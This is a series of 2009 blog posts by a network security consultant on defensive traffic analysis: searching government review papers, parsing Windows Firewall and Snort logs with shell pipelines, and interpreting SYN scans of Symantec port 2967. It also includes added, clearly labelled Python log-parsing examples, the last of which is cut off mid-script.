Sunday, May 31, 2009

The National Cyber Security Effort

Within the last three months, I have restarted my network security business: RMF Network Security (www.rmfnetworksecurity.com). I have been in research mode and I am still in some type of stealth mode, as I think about the implications of restarting a consulting business in the ever-dangerous and now crime-ridden world of network security. The last time I did this, I didn't do enough "product development" and research in advance of my marketing efforts.

However, the last year of network security 'awareness' may change my need to do extensive marketing. Our President has just announced the results of the sixty-day Cyber Security Review. More than 100 source papers were consulted. See my initial analysis below. I started this obscure blog with the idea that I could use the motivation of internet publishing to gauge my re-education and business progress. Within the first month, I have had the same extensive web interest in my blog from American military, military-industrial complex, telecom and educational institutions that I had with my PowerShell blog (also network-centric), but this time with lots of added hits from Russian, Chinese, ex-Eastern-bloc and Brazilian IP addresses. Interestingly, 'researchers' are mostly finding their way to my blog by googling IP addresses from my script dumps!

Apparently, my visitors are either expressing interest in the same Source Internet Protocol Addresses (SIPs) I am logging, or (worst case) those SIPs are looking at me while I discuss them. The network security business has changed since I last participated in developing IDS systems with NAI and Hiverworld. Things are bigger, badder and scarier: more criminal and nation-state oriented simultaneously. Firewalls and IPS software are being pushed beyond their intended capacities, and organized crime and nation-state terrorists have become systematic at IPS evasion, spamming, botnets, bot herding, inserting keystroke loggers, malware, etc. "Cyberwarfare" has a new and significant government interest. Here are some reads I have found lately to prepare myself for changes in the field:

    * "The Shadow Government" (James Bamford). This book documents the build-out of the cyber capacities of the National Security Agency in the last eight years. Among other discussions it documents how the NSA has purchased industrial-strength context-searching software from select software companies to analyze traffic from top network access points across all U.S. telecoms. This apparently is the book that broke the "warrantless wiretapping" scandal a year or so back.
    * "McMafia" (Misha Glenny) discusses in detail the recruitment of the young and poor as cyber hackers for nation-state terrorists and criminal organizations in Russia, Brazil, China, ex-Eastern Bloc nations and elsewhere. He also discusses world crime and the sophistication of world crime to date. A downright terrifying read. Apparently, the average computer in the U.S. is seen as a potential botnet member by most of the world's criminal syndicates/hackers.
    * FOIA from Wired Magazine on the FBI's CIPAV spyware: http://www.wired.com/threatlevel/2009/04/get-your-fbi-sp Also a very interesting read... Criminals use spyware and so does our government... Surprise!

I had some difficulty searching all 100-odd papers online at http://www.whitehouse.gov/cyberreview/documents/ and resorted to mixing Cygwin and cmd.exe shells to do so. I did an initial context search, which admittedly lost papers and data at each command line. In any event, the papers may yet prove interesting reading, although at first glance they appear more policy-oriented than technical.

[from Cygwin; the single-quoted awk program needs a POSIX shell, not cmd.exe]
lynx -source http://www.whitehouse.gov/cyberreview/documents/ | grep pdf | gawk -F\" '{print $4}' > source.txt
[from cmd.exe]
for /f "delims==" %i in (source.txt) do wget "%i"
[from cmd.exe or Cygwin]
ls -1 *.pdf > source2.txt
[from cmd.exe; pdftotext extracts pages 1-1500 of each PDF and the text of all of them is appended to one file]
for /f "delims==" %i in (source2.txt) do pdftotext -f 1 -l 1500 "%i" pdf.txt && cat pdf.txt >> pdf.all.txt
[from Cygwin; 'file' holds the search terms, one per line; -w whole word, -i case-insensitive, -c count matching lines]
for i in `cat file`; do echo `pcregrep -w -i -c "$i" pdf.all.txt` "$i" >> context1.txt; done
[from Cygwin]
$ sort -nr context1.txt
499 Infrastructure
215 Services
194 Financial
53 criminal
52 crime
45 organized
45 loss
41 spam
39 malware
27 losses
24 Firewalls
20 botnets
16 Firewall
15 tax
14 organize
14 crimes
14 China
12 botnet
9 Russia
7 Linux
6 Windows
5 IDS
4 trojans
4 bot
4 IPS
3 bots
2 trojan
2 Israel
2 India
1 IE
1 France
1 Firefox
1 Apple
0 tcpdump
0 syslogd
0 sysklogd
0 spamming
0 keyloggers
0 keylogger
0 key-strokes
0 key-stroke
0 evasion
0 Snort
0 QNX
0 Opera
0 OpenBSD
0 Chrome
0 Bulgaria
0 Brazil
0 BRIC

If you are interested and have the time, let me know if you find my blog approachable, and what interests you think would most drive your businesses and professions to read and think about network security. I think I am gearing up to produce some white papers tailored to many audience types: business, personal, home user, etc. The goal is to generate interest for consulting contracts.

Wednesday, May 27, 2009

Homegrown tcpdump/snort analysis

I have written a script which parses Snort and/or tcpdump text files to display significant information for source and destination IPs and ports. This script allows for some flexibility in filtering ports and ultimately produces separate files for each query and summary statistics as shown below. tcptrace does similar work, but I thought I would contribute something homegrown before I started looking in depth at existing TCP/IDS trace-analysis tools.

## bash or ksh script to sort IP addresses from tcpdump or snort text output
## version 0.1 May 23 2009
## requires one argument: file name consisting of text dump of snort or tcpdump output
## requires pcregrep, awk, the nmap services file, geoiplookup

/* rest of script here: http://www.rmfdevelopment.com/UnixShellScripts/LocateIP.sh.txt */

[some sample output:]
......Summary Statistics........
248 unique Source IP/ port pairs
190 unique source addresses
155 unique source ports
125 unique Destination IP/port pairs
6 unique destination addresses
124 unique destination ports
42 Source ports recognized by nmap services file
38 Destination ports recognized by nmap services file
190 Source cities recognized by GeoLiteCity.dat

[some sample files produced]
# ls -1 uniq*
uniqDIP.txt
uniqDIPPorts.txt
uniqDestIPs.txt
uniqIPs.txt
uniqSIP.txt
uniqSIPPorts.txt
uniqSourceIPs.txt

Sunday, May 17, 2009

Host Protection: Working with Microsoft's Firewall

Both network and host protection are recommended. Each OS has a native host firewall:

OpenBSD: pf
FreeBSD: pf, ipfw or ipfilter (pfSense is a FreeBSD-based firewall distribution, not the base system's packet filter)
Fedora Core: iptables, with SELinux for mandatory access control on top
Windows XP, 2003, 2008, Vista, 7: Windows Firewall (called ICF, Internet Connection Firewall, before XP SP2)

Microsoft's native firewall on XP SP3 can be told to log dropped packets and successful connections, inbound and outbound, to pfirewall.log, up to a maximum log size of 32767 KB (the setting is in kilobytes; the default is 4096 KB). When the file fills it is renamed pfirewall.log.old and a fresh pfirewall.log is started, so only one previous generation is kept and a busy host needs its log collected before it rolls. A full examination of the firewall's configuration is beyond the scope of this post. A reg query of the StandardProfile and DomainProfile keys for every control set, listing all globally open ports and authorized applications, is recommended, as is a manual exploration of the same keys in regedit. Both profiles matter: StandardProfile applies when the machine is not connected to its domain network, DomainProfile when it is, and an opening added to only one of them is easy to miss. (Netsh commands are available on all firewalled Windows versions; please see http://support.microsoft.com/kb/947709. PowerShell can also be used to configure Microsoft's firewall.)

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List | findstr Enabled

reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List | findstr Enabled

A sample partial result would be as follows. Each value is port:protocol:scope:state:name; a scope of LocalSubNet limits the opening to hosts on the local subnet, while * (as on the 500/UDP entry below) accepts traffic from any remote address and deserves a second look:

reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List | findstr Enabled
    139:TCP     REG_SZ  139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
    445:TCP     REG_SZ  445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005
    137:UDP     REG_SZ  137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
    138:UDP     REG_SZ  138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002
    53:UDP      REG_SZ  53:UDP:LocalSubNet:Enabled:DNS-UDP
    53:TCP      REG_SZ  53:TCP:LocalSubNet:Enabled:DNS
    500:UDP     REG_SZ  500:UDP:*:Enabled:@xpsp2res.dll,-22017

The pfirewall.log gives a considerable amount of information, in W3C extended log format with the column layout declared on the #Fields line (so src-ip is field 5, dst-ip field 6, src-port field 7 and dst-port field 8 in the awk commands that follow):

more pfirewall.log
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2009-04-23 10:24:55 DROP UDP 192.168.0.4 192.168.0.255 137 137 96 - - - - - - - RECEIVE
2009-04-23 10:24:56 DROP UDP 192.168.0.4 192.168.0.255 137 137 96 - - - - - - - RECEIVE
2009-04-23 10:24:57 DROP UDP 192.168.0.4 192.168.0.255 137 137 96 - - - - - - - RECEIVE
2009-04-23 10:24:57 DROP UDP 192.168.0.4 192.168.0.255 138 138 202 - - - - - - - RECEIVE
2009-04-23 10:24:57 DROP UDP 192.168.0.4 192.168.0.255 137 137 78 - - - - - - - RECEIVE
2009-04-23 10:24:57 DROP UDP 192.168.0.4 192.168.0.255 137 137 96 - - - - - - - RECEIVE
....

Using Cygwin's bash and gawk, frequency lists of src ports (field 7) and dst ports (field 8) can be obtained:

cat /cygdrive/D/pfirewall.log | awk -F" " '{print $7}' | sort -nr | uniq -c | sort -nr | more
cat /cygdrive/D/pfirewall.log | awk -F" " '{print $8}' | sort -nr | uniq -c | sort -nr | more

Selecting the OPEN action (connections this host itself opened) with pcregrep and using gawk's conditional on field 5 (src-ip) prints the frequency of each destination IP and port for a specified local source IP:

cat /cygdrive/D/pfirewall.log | pcregrep OPEN | awk -F" " '{if ($5=="192.168.0.8") print $6 ":" $8}' | sort -nr | uniq -c | sort -nr | more
  16138 192.168.0.1:53
    902 192.168.0.1:80
    446 74.125.242.24:80
    359 65.214.57.165:80
    304 216.73.87.115:80
    272 85.13.200.108:110
    247 70.32.92.85:80
    240 216.73.87.152:80
    215 75.101.163.8:80
    208 68.142.93.133:80
    203 74.125.127.191:80
    201 128.111.41.37:80
....

Now we restrict the same list to one specific dst port (443 here) and sort the dst IPs contacted from the specified (local) source IP by frequency:

cat /cygdrive/D/pfirewall.log | pcregrep OPEN | awk -F" " '{if ($5=="192.168.0.8") print $6 ":" $8}' | sort -nr | uniq -c | pcregrep ':443' | sort -nr
    113 74.125.53.147:443
     92 74.125.53.83:443
     78 208.235.248.150:443
     50 208.75.76.32:443
     46 74.125.127.103:443
     30 74.125.53.97:443
     24 74.125.127.120:443
     23 65.55.157.60:443
     22 96.6.248.124:443
     21 74.125.53.99:443
...

For example, I was surprised to find all the foreign addresses that my local computer sent NBNS queries to:

cat /cygdrive/D/pfirewall.log | pcregrep OPEN | awk -F" " '{if ($5=="192.168.0.8") print $6 ":" $8}' | sort -nr | uniq -c | pcregrep ':137' | sort -nr
  42 192.168.0.4:137
  39 192.168.0.6:137
  36 192.168.0.2:137
  16 192.168.0.9:137
  15 206.51.224.187:137
  14 208.117.252.85:137
  14 192.168.0.1:137
  13 206.72.124.93:137
  11 74.125.103.33:137
  10 64.94.107.20:137
  10 64.236.79.54:137
  10 206.191.161.8:137
...

Outbound UDP 137 to Internet addresses is usually Windows issuing NetBIOS name or node-status lookups for any remote address it wants a name for; the queries gain the host nothing and hand outsiders a stream of NetBIOS traffic from your address, so UDP 137/138 and TCP 139/445 should be blocked outbound at the perimeter as well as inbound. The dates and times of those queries can be found with:

cat /cygdrive/D/pfirewall.log | pcregrep OPEN | awk -F" " '{if ($5=="192.168.0.8") print $1 ":" $4 ":" $6 ":" $8}' | pcregrep ':137' | sort -nr | more
2009-05-14:UDP:192.168.0.4:137
2009-05-14:UDP:192.168.0.4:137
2009-05-06:UDP:75.52.124.131:137
2009-05-06:UDP:74.125.103.28:137
2009-05-06:UDP:69.64.6.21:137
2009-05-06:UDP:66.35.45.202:137
2009-05-06:UDP:66.35.45.202:137
2009-05-06:UDP:66.35.45.202:137
2009-05-06:UDP:66.35.45.201:137
2009-05-06:UDP:66.35.45.201:137
2009-05-06:UDP:66.35.45.201:137
2009-05-06:UDP:65.55.52.84:137
2009-05-06:UDP:65.55.52.148:137
2009-05-06:UDP:65.55.185.61:137
2009-05-06:UDP:65.55.185.29:137
2009-05-06:UDP:65.55.184.189:137
2009-05-06:UDP:65.173.218.69:137
2009-05-06:UDP:65.173.218.69:137
2009-05-06:UDP:64.94.107.16:137
2009-05-06:UDP:64.236.115.52:137
2009-05-06:UDP:4.71.104.187:137
....
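The pfirewall.log pipelines above depend on field positions (5, 6, 7, 8) being counted correctly. As an added example, not code from the original post, here is the same analysis in Python: it takes the column names from the log's own #Fields line, answers the destination-frequency and single-port questions, and flags NetBIOS sessions opened to addresses outside the private ranges. The log lines are constructed in the XP log format shown above, with the documentation ranges 203.0.113.0/24 and 198.51.100.0/24 standing in for Internet hosts.

```python
"""Windows Firewall (XP/2003) log analysis; added example, not the post's own code."""
import ipaddress
from collections import Counter

# Constructed sample in the pfirewall.log format shown above. 203.0.113.0/24
# and 198.51.100.0/24 are documentation ranges standing in for Internet hosts.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2009-04-23 10:24:55 DROP UDP 192.168.0.4 192.168.0.255 137 137 96 - - - - - - - RECEIVE
2009-04-23 10:25:01 OPEN UDP 192.168.0.8 192.168.0.1 1034 53 - - - - - - - - -
2009-04-23 10:25:01 OPEN TCP 192.168.0.8 192.168.0.1 1035 80 - - - - - - - - -
2009-04-23 10:25:02 OPEN TCP 192.168.0.8 203.0.113.10 1036 443 - - - - - - - - -
2009-04-23 10:25:03 OPEN UDP 192.168.0.8 192.168.0.4 137 137 - - - - - - - - -
2009-04-23 10:25:04 OPEN UDP 192.168.0.8 203.0.113.10 137 137 - - - - - - - - -
2009-04-23 10:25:05 OPEN UDP 192.168.0.8 198.51.100.7 137 137 - - - - - - - - -
2009-04-23 10:25:06 OPEN UDP 192.168.0.8 192.168.0.1 1037 53 - - - - - - - - -
2009-04-23 10:25:07 OPEN-INBOUND TCP 192.168.0.4 192.168.0.8 2049 445 - - - - - - - - -
"""

# Ranges treated as "ours" here: RFC 1918, loopback and link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_log(text):
    """One dict per record, keyed by the names on the #Fields line, so the
    code never hard-codes that src-ip is column 5."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # truncated or foreign line: skip rather than misalign
        records.append(dict(zip(fields, values)))
    return records


def top_destinations(records, src_ip, action="OPEN", dst_port=None, limit=10):
    """dst-ip:dst-port frequency for one local source; the Python form of
    'pcregrep OPEN | awk ... | sort | uniq -c | sort -nr'."""
    counts = Counter(
        f"{r['dst-ip']}:{r['dst-port']}" for r in records
        if r["action"] == action and r["src-ip"] == src_ip
        and (dst_port is None or r["dst-port"] == str(dst_port)))
    return counts.most_common(limit)


def external_netbios(records, src_ip):
    """NetBIOS (UDP 137/138) sessions src_ip opened to addresses outside
    INTERNAL_NETS: the 'foreign NBNS queries' finding, computed directly."""
    hits = Counter()
    for r in records:
        if (r["action"] == "OPEN" and r["src-ip"] == src_ip
                and r["protocol"] == "UDP" and r["dst-port"] in ("137", "138")
                and not is_internal(r["dst-ip"])):
            hits[r["dst-ip"]] += 1
    return hits


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for dst, n in top_destinations(recs, "192.168.0.8"):
        print(f"{n:6d} {dst}")
    print("NetBIOS to external hosts:", dict(external_netbios(recs, "192.168.0.8")))
```

Point parse_log at the real file (open("/cygdrive/D/pfirewall.log").read()) and the same three functions apply; because the parser skips any line whose field count disagrees with the header, a log truncated mid-write does not shift every later column.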

These two commands are also recommended, for checking what the Server and Workstation services (the SMB/NetBIOS side of the host) are configured to offer and use:

C:\WINDOWS\system32\drivers\etc>net config server
C:\WINDOWS\system32\drivers\etc>net config workstation

Friday, May 15, 2009

Bash 4.0, awk, geoiplookup and pcregrep are fast

Bash 4.0, awk, geoiplookup and pcregrep make a powerfully fast search team. Here I find out how many packets (one TTL header line per packet, each a source/destination socket pair) are in my Snort dump:
bash-4.0# snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep TTL | awk -F":" '{print $1}' | wc -l                   
     372 

Then I find out how many unique SIPs are in those socket pairs (sort must come before uniq, which only collapses adjacent duplicates; the 226 below came from the original uniq-before-sort ordering and is therefore an upper bound):
bash-4.0# snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep TTL | awk -F":" '{print $1}' | sort | uniq | wc -l
     226 

Then I find my top ten Source IP Addresses:
bash-4.0# snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep TTL | awk -F":" '{print $1}' | sort | uniq -c | sort -nr | head -n 10
  
  62 218.103.62.150
  15 222.215.230.49
  14 221.195.73.68
  11 121.15.245.215
  10 119.161.130.75
   8 209.85.163.126
   8 125.65.165.139
   7 66.35.46.195
   7 209.85.201.125
   6 64.106.128.150
....
Then I determine which ports on my host my top SIP (foreign address) has tried to connect to (the third colon-separated field of the header line is the destination port; these are not the remote side's source ports):
bash-4.0# snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep 218.103.62.150 | awk -F":" '{print $3}'| awk -F" " '{print $1}' | sort -n | uniq

113
160
1433
1434
2967
5554
6429
7212
12712
16896
17337
17681
17919
18448
18487
18488
18649
18932
19899
33436
38507

Next I find the top destination ports for each of my top ten SIPs (temp.txt holds those ten addresses, one per line):
bash-4.0# for i in `cat temp.txt`; do echo $i && snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep $i | awk -F":" '{print $3}'| awk -F" " '{print $1}' | sort | uniq -c | sort -nr; done

218.103.62.150
   3 6429
   3 5554
   3 38507
   3 33436
   3 2967
   3 19899
   3 18932
   3 18649
   3 18488
   3 18487
   3 18448
   3 17919
   3 17681
   3 17337
   3 16896
   3 160
   3 1434
   3 1433
   3 12712
   3 113
   2 7212
222.215.230.49
   6 7212
   6 3128
   3 8000
221.195.73.68
   7 8000
   7 7212
121.15.245.215
   7 3128
   4 8000
119.161.130.75
  10 2967
209.85.163.126
   8 33137
125.65.165.139
   4 8000
   4 3128
66.35.46.195
   7 33436
209.85.201.125
   3 18205
   3 18184
   1 18077
64.106.128.150
   6 33442

Last, I retrieve those top ten SIP city locations (geoiplookup takes the address as an argument and ignores standard input, so there is no need to re-run Snort for each lookup):
bash-4.0# for i in `cat temp.txt`; do echo $i `geoiplookup -f /usr/local/share/GeoIP/GeoLiteCity.dat $i`; done

218.103.62.150 GeoIP City Edition, Rev 1: HK, 00, Kowloon, (null), 22.316700, 114.183296, 0, 0
222.215.230.49 GeoIP City Edition, Rev 1: CN, 32, Chengdu, (null), 30.666700, 104.066597, 0, 0
221.195.73.68 GeoIP City Edition, Rev 1: CN, 10, Hebei, (null), 39.889702, 115.275002, 0, 0
121.15.245.215 GeoIP City Edition, Rev 1: CN, 30, Jiangmen, (null), 22.583300, 113.083298, 0, 0
119.161.130.75 GeoIP City Edition, Rev 1: CN, 19, Chaoyang, (null), 41.570301, 120.458603, 0, 0
209.85.163.126 GeoIP City Edition, Rev 1: US, CA, Mountain View, 94043, 37.419201, -122.057404, 807, 650
125.65.165.139 GeoIP City Edition, Rev 1: CN, 32, Chengdu, (null), 30.666700, 104.066597, 0, 0
66.35.46.195 GeoIP City Edition, Rev 1: US, CO, Denver, 80216, 39.785000, -104.941498, 751, 303
209.85.201.125 GeoIP City Edition, Rev 1: US, CA, Mountain View, 94043, 37.419201, -122.057404, 807, 650
64.106.128.150 GeoIP City Edition, Rev 1: US, NJ, Hoboken, 07030, 40.745800, -74.032097, 501, 201

Wednesday, May 13, 2009

Understanding an attack

Snort can be run in daemon mode, with a configuration file that logs on certain alerts only. For demonstration, we can instead run Snort in packet-dump mode (-dev, plus -X for the full hex dump) for a day or so, writing a binary tcpdump-format log named after the start time with -L, and use a BPF filter to drop the traffic we already understand (name service, whois, web, mail, NTP, syslog, NetBIOS, broadcasts, ICMP, IGMP and ARP) so that what remains is the unsolicited probing:

/usr/local/bin/snort -devX -i xl0 -L $(date "+%b%e%H%M%S%Z%Y") 'port not (domain or whois or http or https or syslog or ntp or smtp or 137 or 139) and not (broadcast or icmp or igmp or arp)'

After some awkward awk statements and some ditzy ksh work, we have a list of the destination ports that outside hosts probing our network seem interested in:

snort -vdeX -r May12085154PDT2009.1242143514 | grep TTL: | awk -F"->" '{print $1 ":" $2 ":" $3}' | awk -F":" '{print $4}' | awk -F" " '{print $1}' | sort -nr | uniq -c | sort -nr

14 2967
6 8000
6 5900
6 3128
6 22
5 23
5 1434
5 12712
4 7212
4 4899
4 1433
1 8080
1 7209
1 65535
1 56017
1 3306
1 23803
1 21
1 19756
1 19696
1 1024

snort -vdeX -r May12085154PDT2009.1242143514 | grep TTL: | awk -F"->" '{print $1 ":" $2 ":" $3}' | awk -F":" '{print $4}' | awk -F" " '{print $1}' | sort | uniq | sort -nr >> ports.txt

for i in `cat ports.txt`; do grep -w $i /usr/local/share/nmap/nmap-services;done

http-proxy 8080/tcp # Common HTTP proxy/second web server port
http-alt 8000/tcp # A common alternative http port
vnc 5900/tcp # Virtual Network Computer display
radmin 4899/tcp # Radmin (www.radmin.com) remote PC control software
mysql 3306/tcp # mySQL
squid-http 3128/tcp #
symantec-av 2967/udp # Symantec AntiVirus (rtvscan.exe)
ms-sql-m 1434/tcp # Microsoft-SQL-Monitor
ms-sql-m 1434/udp # Microsoft-SQL-Monitor
ms-sql-s 1433/tcp # Microsoft-SQL-Server
ms-sql-s 1433/udp # Microsoft-SQL-Server
kdm 1024/tcp # K Display Manager (KDE version of xdm)
telnet 23/tcp #
telnet 23/udp #
ssh 22/tcp # Secure Shell Login
ssh 22/udp # Secure Shell Login
ftp 21/tcp # File Transfer [Control]
ftp 21/udp # File Transfer [Control]

The nmap services file explains much here: proxies (3128, 8000, 8080), remote access (22, 23, 4899, 5900) and databases (1433, 1434, 3306) are the usual targets of automated scanning. But why the large interest in a Symantec AntiVirus port? It turns out others have noticed this recently as well and are asking for input:

http://isc.sans.org/diary.html?storyid=6319.
http://msmvps.com/blogs/harrywaldron/archive/2006/11/27/new-botnet-impacts-symantec-client-port-2967-on-unpatched-pcs.aspx
http://www.offensivecomputing.net/?q=node/403

Is this a new or mutated trojan? A worm? A remote exploit? Multiple addresses are interested in connecting to us on this port:

# snort -vdeX -r May12085154PDT2009.1242143514 | grep TTL: | grep 2967 | sort -nr | uniq -c | sort -nr

3 218.75.95.242:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:256 IpLen:20 DgmLen:40
2 119.161.130.75:6000 -> 192.168.0.12:2967 TCP TTL:99 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 61.191.63.8:6000 -> 192.168.0.12:2967 TCP TTL:103 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 61.145.62.75:6000 -> 192.168.0.12:2967 TCP TTL:107 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 60.173.12.60:6000 -> 192.168.0.12:2967 TCP TTL:106 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 60.172.229.11:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:65419 IpLen:20 DgmLen:40
1 60.172.229.11:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:42349 IpLen:20 DgmLen:40
1 222.186.26.93:6000 -> 192.168.0.12:2967 TCP TTL:103 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 121.140.174.105:6000 -> 192.168.0.12:2967 TCP TTL:107 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 121.14.156.149:6000 -> 192.168.0.12:2967 TCP TTL:102 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 121.14.156.148:6000 -> 192.168.0.12:2967 TCP TTL:103 TOS:0x20 ID:256 IpLen:20 DgmLen:40


But each packet is a bare connection attempt: DgmLen:40 is a 20-byte IP header plus a 20-byte TCP header with no options and no payload, and the flags show only SYN. No overflow can ride on a SYN; an exploit against the Symantec service could only be sent after the three-way handshake completes, so if nothing on this host answers on 2967 the exchange ends here. What the headers do show is that every source uses source port 6000, TOS 0x20, a window of 0x4000, a sequence number whose low 16 bits are zero and (with two exceptions) IP ID 256. Unrelated operating systems do not agree on those values; one crafted-packet scanner does, which fits the automated scanning for this port reported in the links above better than a new exploit. A buffer overflow in the Symantec AntiVirus port would have to arrive later, with data:

218.75.95.242:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:256 IpLen:20 DgmLen:40
******S* Seq: 0x60B40000 Ack: 0x0 Win: 0x4000 TcpLen: 20
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20 .`.0k...[.....E
0x0010: 00 28 01 00 00 00 69 06 55 BE DA 4B 5F F2 C0 A8 .(....i.U..K_...
0x0020: 00 0C 17 70 0B 97 60 B4 00 00 00 00 00 00 50 02 ...p..`.......P.
0x0030: 40 00 F1 34 00 00 00 00 00 00 00 00 @..4........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

05/13-12:59:50.507559 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x3C
121.140.174.105:6000 -> 192.168.0.12:2967 TCP TTL:107 TOS:0x20 ID:256 IpLen:20 DgmLen:40
******S* Seq: 0x4260000 Ack: 0x0 Win: 0x4000 TcpLen: 20
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20 .`.0k...[.....E
0x0010: 00 28 01 00 00 00 6B 06 66 06 79 8C AE 69 C0 A8 .(....k.f.y..i..
0x0020: 00 0C 17 70 0B 97 04 26 00 00 00 00 00 00 50 02 ...p...&......P.
0x0030: 40 00 60 0B 00 00 00 00 00 00 00 00 @.`.........
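The per-SIP port lists in the "Bash 4.0" post above and the comparison of the 2967 headers here are both questions about Snort's two header lines per packet, so one script serves both. This is an added example, not the post's own script: it pairs each header line with the flags line that follows it, lists the destination ports each source touched, and extracts the header values shared by every bare SYN to a given port. The sample is constructed from values shown above; the sequence numbers on the third and fourth packets and the entire fifth packet (an ordinary client SYN with options and a random IP ID) are made up for contrast.

```python
"""Per-source summary and scanner fingerprint from Snort -v header lines.
Added example; not the post's own code."""
import re
from collections import defaultdict

# Constructed sample: the first two header/flags pairs are from the capture
# above, the next two reuse addresses seen above with made-up sequence
# numbers, and the last is an ordinary client SYN (options, random IP ID).
SAMPLE = """\
218.75.95.242:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:256 IpLen:20 DgmLen:40
******S* Seq: 0x60B40000 Ack: 0x0 Win: 0x4000 TcpLen: 20
121.140.174.105:6000 -> 192.168.0.12:2967 TCP TTL:107 TOS:0x20 ID:256 IpLen:20 DgmLen:40
******S* Seq: 0x4260000 Ack: 0x0 Win: 0x4000 TcpLen: 20
119.161.130.75:6000 -> 192.168.0.12:2967 TCP TTL:99 TOS:0x20 ID:256 IpLen:20 DgmLen:40
******S* Seq: 0x77130000 Ack: 0x0 Win: 0x4000 TcpLen: 20
60.172.229.11:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:65419 IpLen:20 DgmLen:40
******S* Seq: 0x3C0E0000 Ack: 0x0 Win: 0x4000 TcpLen: 20
222.215.230.49:4321 -> 192.168.0.12:3128 TCP TTL:112 TOS:0x0 ID:31337 IpLen:20 DgmLen:48
******S* Seq: 0x1A2B3C4D Ack: 0x0 Win: 0xFFFF TcpLen: 28
"""

HEADER_RE = re.compile(
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)\s+TCP\s+TTL:(?P<ttl>\d+)\s+"
    r"TOS:0x(?P<tos>[0-9A-Fa-f]+)\s+ID:(?P<id>\d+)\s+IpLen:(?P<iplen>\d+)\s+DgmLen:(?P<dgmlen>\d+)")
FLAGS_RE = re.compile(
    r"(?P<flags>[*12UAPRSF]{8})\s+Seq:\s*0x(?P<seq>[0-9A-Fa-f]+)\s+Ack:\s*0x(?P<ack>[0-9A-Fa-f]+)\s+"
    r"Win:\s*0x(?P<win>[0-9A-Fa-f]+)\s+TcpLen:\s*(?P<tcplen>\d+)")
INT_FIELDS = ("sport", "dport", "ttl", "id", "iplen", "dgmlen")


def parse_packets(text):
    """One dict per packet: the header line plus the flags line after it."""
    packets, current = [], None
    for line in text.splitlines():
        h = HEADER_RE.search(line)
        if h:
            current = {k: (int(v) if k in INT_FIELDS else v) for k, v in h.groupdict().items()}
            packets.append(current)
            continue
        f = FLAGS_RE.search(line)
        if f and current is not None:
            current.update(flags=f["flags"], seq=int(f["seq"], 16),
                           win=int(f["win"], 16), tcplen=int(f["tcplen"]))
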